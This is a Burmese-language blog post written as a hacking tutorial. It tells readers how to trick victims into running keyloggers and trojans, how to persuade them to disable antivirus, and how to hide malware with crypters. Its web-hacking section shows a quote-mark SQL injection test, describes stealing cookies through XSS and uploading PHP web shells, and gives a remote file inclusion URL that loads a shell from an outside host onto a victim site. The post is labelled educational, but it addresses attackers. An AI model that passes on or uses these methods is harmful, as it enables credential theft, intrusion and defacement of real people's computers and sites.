ဒီနည္းလမ္းဟာ သင့္ရဲ႕ သားေကာင္ကို လွည့္စားျပီး သူတို႔ရဲ႕ information ေတြကို ရယူဖို႔အတြက္ အေကာင္းဆံုးနည္းလမ္းတစ္ခုျဖစ္ပါတယ္။ ( Keylogger Collection )
အားနည္းခ်က္ :၁။ သင့္ရဲ႕ သားေကာင္က keylogger ကိုလက္ခံရရွိတဲ႔ အခါ သူတို႔ရဲ႕ antivirus ေတြက keylogger ကို အလိုအေလွ်ာက္ delete လုပ္လိုက္ျခင္းျဖစ္ပါတယ္။ ဒါေၾကာင့္ သင္အေနနဲ႔ တစ္စံုတစ္ရာ လွည့္ျဖားျခင္းအားျဖင့္ antivirus ကို disable လုပ္ဖို႔ စည္းရံုးသိမ္းသြင္းရမွာ ျဖစ္ပါတယ္။
၂။ တခါတရံမွာ keylogေတြကို ေပးပို႔ေနတဲ႔အခ်ိန္မွာ firewall က block လုပ္လိုက္ျခင္းမ်ားပဲ ျဖစ္ပါတယ္။
အၾကံျပဳခ်က္ - က်ေနာ္အၾကံေပးလိုတာကေတာ့ "crypters" လို႔ေခၚတ႔ဲ program ေတြကို အသံုးျပဳဖို႔ပါပဲ။ ၄င္းတို႔က သင့္ရဲ႕ server ေတြကို ရွာေဖြမေတြ႔ပဲ ျပဳလုပ္ႏိုင္ေစဖို႔ကူညီေပးပါလိမ့္မယ္။ ဒါဆိုရင္ သင့္သားေကာင္ရဲ႕ anti-virus ေတြက ၄င္းတို႔ကို detect မလုပ္ႏိုင္ေတာ့ပါဘူး။ Anti-Virus နဲ႔ တူတူပုန္းတမ္းကစားၾကမယ္ ဆိုတဲ႔ post မွာ Crypter ေတြကို တင္ေပးထားခဲ႔ျပီး ျဖစ္ပါတယ္။
(ဃ) TrojansTrojan ေတြကေတာ့ keyloggerေတြရဲ႕ ဖခင္ နဲ႔တူပါတယ္။ Trojan ေတြက အေပၚမွာ ေဖာ္ျပခဲ႔တဲ႔ keylogger ေတြအတိုင္းပဲ သင့္ဆီကို keylog ေတြ ေပးပို႔ပါတယ္။ ဒါ့အျပင္ ၄င္းတို႔က သင့္သားေကာင္းရဲ႕ computer ကို သင္ ထိန္းခ်ဳပ္မႈ ရေစပါတယ္။ သင့္သားေကာင္ရဲ႕ computer မွာ သင့္စိတ္ၾကိဳက္ fileေတြကို Edit / delete/ upload/ download လုပ္ႏိုင္ပါတယ္။ Trojan ေတြမွာ keyboard ကို ေကာင္းေကာင္း အလုပ္မလုပ္ေအာင္ ( keyboard မွာ ကိုယ္ႏွိပ္လိုက္တဲ႔ စာလံုးက တစ္ခု ေပၚေနတာက တစ္ခု ေပၚခ်င္တဲ႔ စာလံုးေလွ်ာက္ေပၚေနတာ၊ တခါတေလ keys ေတြကို ရိုက္လို႔ရတဲ႔ အခါ ရတယ္ မရတဲ႔ အခါလည္း မရဘူး အဲလိုမ်ိဳးေတြေပါ့ )၊ CD ROM ေတြ Eject လုပ္တဲ႔ အခါ ထြက္မလာတာ ၊ CD ျပန္ထည့္ေပးဖို႔အတြက္ ေတာင္းဆိုတာ စသျဖင့္ အျခား အျခားေသာ feature ေတြလည္း ပါ၀င္ပါေသးတယ္။ ( Trojan Toolမ်ား )
အားနည္းခ်က္ :keylogger ေတြနဲ႔ အတူတူပါပဲ။
အၾကံျပဳခ်က္ - keylogger မွာ အၾကံဳျပဳခဲ႔သလိုပါပဲ crypter ေတြသံုးပါ။
Web Hacking
က်ေနာ္က ဘယ္ website မဆို hack ဖို႔အတြက္ hacker ေတြကို အကူအညီေပးႏိုင္တဲ႔ အသံုးျပဳမႈအမ်ားဆံုးျဖစ္တဲ႔ web hacking နည္းပညာ အခ်ိဳ႕ ကို ေဆြးေႏြးေပးသြားပါမယ္။ တဘက္ကၾကည့္ရင္လည္း ဒါဟာ သင္ site ကို ကာကြယ္ဖို႔အတြက္ ကူညီပါလိမ့္မယ္။
(က)SQL Injection
( ခ ) XSS
( ဂ) Shells
(ဃ) RFI
( င ) ေနာက္ထပ္အမ်ားၾကီး ရွိပါေသးတယ္။ ဒါေပမယ့္ ဒီမွာေတာ့ အသံုးျပဳမႈအမ်ားဆံုးျဖစ္တာကိုပဲ ေဆြးေႏြးသြားမွာ ျဖစ္ပါတယ္။
(က) SQL Injection
ယေန႔အခ်ိန္အခါမွာ website အမ်ားစုဟာ SQL Database တစ္ခုနဲ႔ connect လုပ္ထားၾကပါတယ္။ SQL Databaseက သူတို႔ရဲ႕ website သို႔ လာေရာက္လာပတ္သူက register လုပ္သြားတဲ႔အခါ username နဲ႔ password ေတြ ( encrypt လုပ္ျပီး )ကို သိမ္းဆည္းထားဖို႔အတြက္ သူတို႔ကို ကူညီပါတယ္။ SQL database က user တစ္ေယာက္ logs in လုပ္တဲ႔ အခါတိုင္းမွာ ေမးခြန္းေတြေမးျမန္းတဲ႔ အလုပ္ငန္းစဥ္ကို လုပ္ေဆာင္ပါတယ္။ ၄င္းတို႔ database ဆီသြားျပီး မွန္ကန္ေသခ်ာတဲ႔ password ဟုတ္မဟုတ္ ၾကည့္ပါတယ္။ အကယ္၍ မွန္ကန္တယ္ဆုိရင္ေတာ့ user ကို log in လိုက္ပါတယ္၊ မမွန္ဘူးဆိုရင္ေတာ့ error တစ္ခုကို ေပးပါလိမ့္မယ္။ ဒါေၾကာင့္ အေျခခံေဆာင္ရြက္ခ်က္ကေတာ့ database မွာရွိတဲ႔ internet information ကုိ အသံုးခ်ဖို႔ၾကိဳးစားျပီး database ထဲမွာရွိတဲ႔ database ထဲမွာ ေမးခြန္းတစ္ခုကို စစ္ေဆးဖို႔ command တစ္ခုကို လိုက္နာေဆာင္ရြက္ေနျခင္းျဖစ္ပါတယ္။ ဒီနည္းလမ္းနဲ႔ ပတ္သတ္ျပီး ဒီ post ထဲမွာ ထည့္သြင့္ဖို႔ဆိုတာ တကယ့္ကို မျဖစ္ႏိုင္ပါဘူး။ ဘာေၾကာင့္လဲဆိုေတာ့ ဒီနည္းလမ္းဟာ website ကို hack ဖို႔အတြက္ နည္းလမ္းေတြထဲမွာ အရႈပ္ေထြး အခက္ခဲဆံုးနည္းလမ္းတစ္ခု ျဖစ္လို႔ပါ။
သင့္ရဲ႕ website မွာ RFI attach လုပ္ဖို႔ အားနည္းခ်က္ရွိလား မရွိလားဆိုတာကို သိခ်င္ရင္ ေအာက္ပါအတိုင္းျပဳလုပ္ပါ...အကယ္၍ သင့္ site ရဲ႕ URL က....
yoursite.com/index.php?id=545
ျဖစ္ေနတယ္ဆိုရင္ ၄င္းရဲ႕ အဆံုးမွာ ( ' ) ကို ေအာက္မွာ ျပထားသလိုမ်ိဳး ေပါင္းထည့္ေပးပါ...
yoursite.com/index.php?id=545'
( ခ ) XSS
XSS ကေတာ့ အခ်ိဳ႕ website ေတြကို hack ဖို႔အတြက္ ေကာင္းမြန္တဲ႔ အျခားနည္းလမ္းတစ္ခုလို႔ ဆိုႏိုင္ပါတယ္။ အခ်ိဳ႕ website/ forum ေတြက post ( သို႔ ) ေဆာင္းပါး ေတြထဲမွာ HTML ခြင့္ျပဳခဲ႔မယ္ဆိုရင္ hacker က content ထဲကို အႏၲရာယ္ရွိတဲ႔ script ေတြကို post လုပ္ႏိုင္ပါတယ္။ ဒါေၾကာင့္ ဘယ္အခ်ိန္မဆို user တစ္ေယာက္က page ကုိဖြင့္လိုက္တုိင္း cookieေတြက hacker ဆီကိုေပးပို႔ပါလိမ့္မယ္။ ဒီအတြက္ သူက user ကဲ႔သို႔ log in လုပ္ႏိုင္ျပီး website ကို #$%@# လုပ္ပါေတာ့တယ္။
( ဂ ) Shells
Shell ဆိုတာကေတာ့ အႏၲရာယ္ရွိတဲ႔ .php script ျဖစ္ပါတယ္။ ၄င္းကိုဘယ္လိုလုပ္ရမလဲ ဆိုေတာ့ avaters, recepie, tricks , feedbacks ကဲ႔သို႔ေသာ ဘယ္ဖိုင္မဆို upload လုပ္ႏိုင္တဲ႔ website တစ္ခုခုမွာ ေနရာ တစ္ခု ရွာပါ။ ျပီးရင္ သင့္ရဲ႕ shell file ကို အဲဒီထဲကို upload လုပ္ႏိုင္ဖို႔ၾကိဳးစားပါ။ upload ျပီးသြားရင္ ၄င္းကို URL bar မွာဖြင့္ပါ။ အဲဒီ webhosting ရဲ႕ FTP account တစ္ခုလံုးကို သင္ ျမင္ရပါလိမ့္မယ္။ index page ထဲဲမွာပါ၀င္သမွ်ကို သင့္စိတ္ၾကိဳက္ rename/Edit/upload/download ၾကိဳက္သလိုလုပ္လို႔ရပါျပီ။ အခုလိုျပဳလုပ္ျခင္းကို deface လို႔လည္း ေခၚပါတယ္။
(ဃ) RFI
RFI ကလည္း website တစ္ခုကို deface လုပ္ဖို႔အတြက္ ေကာင္းတဲ့နည္းလမ္းတစ္ခုပဲ ျဖစ္ပါတယ္။ ၄င္းကို shell နဲ႔အတူအသံုးျပဳရမွာ ျဖစ္ပါတယ္။ ၄င္းကို သင့္ရဲ႕ shell ေပၚမွာ upload လုပ္ျပီးျပီး ဆုိရင္ သင့္ကိုအေထာက္အကူေပးပါလိမ့္မယ္...
yoursite.com/shell.txt
သင္က RFT သို႔ အားနည္းခ်က္ရွိတဲ႔ site တစ္ခုကို ရွာေတြ႔ရပါမယ္... အဲဒီေနာက္ ေအာက္မွာျပထားတဲ႔ အတိုင္း ျပဳလုပ္ႏိုင္ပါတယ္...
victimssite.com/index.php?page=yousite.com/shell.txt
ဒီဟာက သင့္ကို သင့္သားေကာင္ရဲ႕ sites FTP ၀င္လမ္း ကုိ ထပ္ေပးပါလိမ့္မယ္။ shell မွာလိုပဲ သင္ၾကိဳက္သလို သင့္စိတ္ၾကိဳက္ လုပ္လို႔ရပါျပီ။
အကယ္၍ သင္က သင့္ website က RFI attach လုပ္ဖို႔ အားနည္းခ်က္ ရွိလား မရွိဘူးလားဆိုတာကို စစ္ေဆးခ်င္ရင္ ေအာက္ပါအတိုင္း လုပ္ပါ...
အကယ္၍ သင့္ site ရဲ႕ URL က
yoursite.com/index.php?id=545
ျဖစ္ေနခဲ႔ရင္ ၄င္းရဲ႕ အဆံုးမွာ ေအာက္မွာျပထားတဲ႔ အတိုင္း ေပါင္းထည့္ေပးပါ...
yoursite.com/index.php?id=http://www.google.com
အကယ္၍ သင့္ page ထဲမွာ google page ပါ၀င္ေနမယ္ဆိုရင္ေတာ့ အဲဒီအဓိပၸာယ္က RFI သို႔ တြဲဆက္ျခင္းမွာ ေပ်ာ့ကြက္တစ္ခုျဖစ္ပါတယ္။
(Educational Purposes Only)
source: http://wytumyanmar.com
No comments:
Post a Comment